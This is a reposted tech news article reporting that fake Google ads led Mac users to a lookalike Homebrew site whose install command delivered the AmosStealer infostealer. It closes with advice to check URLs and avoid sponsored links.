Fake Google Ads Trick Mac Users To Install Homebrew Malware
Arthur T Knackerbracket has processed the following story:
Leveraging an attack vector that's been in play off and on for the last two decades, hackers are targeting Mac users with malware camouflaged as the popular Homebrew tool, and spreading it through deceptive Google ads.
Malicious actors are leveraging Google ads to distribute malware through a counterfeit Homebrew website. The campaign targets macOS and Linux users with an infostealer that compromises credentials, browser data, and cryptocurrency wallets.
Homebrew, a widely-used open-source package manager, enables users to manage software through a command line. Hackers recently exploited its popularity by creating a malicious Google ad.
The ad, spotted by developer Ryan Chenkie, appeared legitimate, displaying the correct URL for the Homebrew website, "brew.sh." However, users who clicked it were redirected to a fake website hosted at "brewe.sh."
The fake site mimicked Homebrew's installation process, tricking visitors into running a malicious command. While the legitimate Homebrew site also provides such installation commands, running the script from the fake site downloaded and executed malware, specifically AmosStealer.
AmosStealer, also known as "Atomic Stealer," is a macOS-focused infostealer sold to cybercriminals for $1,000 per month. It targets over 50 cryptocurrency wallets, browser-stored data, and desktop apps.
Previously, this malware has been used in similar campaigns, including fake Google Meet pages, making it a go-to tool for Apple-focused cyberattacks.
Homebrew's project leader, Mike McQuaid, expressed frustration with Google's inability to prevent such scams. While the malicious ad was taken down, McQuaid highlighted that similar incidents continue to occur due to insufficient oversight of sponsored ads.
Cybersecurity experts recommend avoiding sponsored links when searching for popular tools. Bookmarking official websites or accessing them directly can help users minimize risk.
[...] To stay safe from these types of attacks, make sure to double-check website URLs before clicking, stick to bookmarks for trusted sites, and steer clear of installing software from unfamiliar or sponsored links.
Google has taken down this one particular malicious ad. As history has proven, the danger from bad ads isn't gone, so Mac users - especially those using Homebrew - need to stay alert.
Read more of this story at SoylentNews.